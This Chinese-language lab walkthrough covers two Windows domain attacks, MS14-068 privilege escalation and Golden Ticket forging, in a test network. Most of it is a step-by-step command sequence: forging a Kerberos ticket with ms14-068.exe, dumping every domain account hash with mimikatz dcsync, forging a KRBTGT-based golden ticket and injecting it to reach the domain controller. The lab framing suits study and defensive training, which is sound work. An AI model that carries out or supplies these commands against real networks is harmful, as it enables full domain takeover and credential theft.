Kerberos 是一种网络认证协议，广泛应用于企业网络中。然而，Kerberos 也存在一些安全漏洞，其中最著名的是 MS14-068 漏洞（CVE-2014-6324）。该漏洞允许攻击者将域内任意用户权限提升至域管理员权限，影响包括 Windows Server 2003、2008、2012 等多个版本的操作系统。

一、MS14-068利用条件
1、获取域普通用户的账号密码
2、服务器未打KB3011780补丁
3、域控服务器的IP
二、实验环境
win7作为域成员主机
winsever2008作为域控
三、操作步骤
1、检查服务器是否打KB3011780补丁
使用systeminfo命令查看所打补丁，发现修补程序暂缺，没有KB3011780

2、在域控上建立一个普通域用户alex-slt

net user <域用户名> <密码> /ADD /DOMAIN /EXPIRES:NEVER /PASSWORDCHG:NO

3、在未提权前尝试访问域控的根目录发现拒绝访问

dir \\<自己域控的名字>\c$

4、登录alex-slt输入

whoami /user > sid.txt

获取用户sid并写入sid.txt文件

5、删除win7上的票据

klist \\查看当前缓存的票据

klist purge \\删除所有票据

6、利用MS14-068.exe生成票据
ms14-068.exe

ms14-068.exe -u <用户名>@<域名> -p <密码> -s <获得的sid> -d <域控名>

7、使用mimikatz导入票据

kerberos::ptc <生成的票据名>

8、查看是否只有一张票据

klist

9、尝试访问域控根目录，由于目前环境域控为winsever2012R2无法访问成功，winsever2008R2及以下版本可以成功。

黄金票据
一、原理
攻击者通过窃取KRBTGT账户的NTLM哈希或AES密钥，伪造任意用户的TGT。由于KRBTGT是KDC的根密钥，伪造的TGT可绕过所有认证流程，直接获取域内任意资源的访问权限。
二、操作步骤
1.切换pth-slt用户获取域的sid
域的sid为域用户的sid减去最后一段数字

2.获取krbtgt用户hash，利用psexec连接到域控从而获取域控反弹到win7的shell

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<域名>/all /csv" "exit" >hash.txt

3.将域控的hash下载到win7

4.使用mimikatz制作黄金票据

kerberos::golden /user:<任意用户名> /domain:<域名> /sid:<域的sid> /krbtgt:<hash> /ticket:<票据名称>

5.将票据复制到alex-slt桌面并清除当前内存票据

6.利用alex-slt进行票据传递

kerberos::ptt ticket.kirbi

7.alex-slt能访问根目录，攻击成功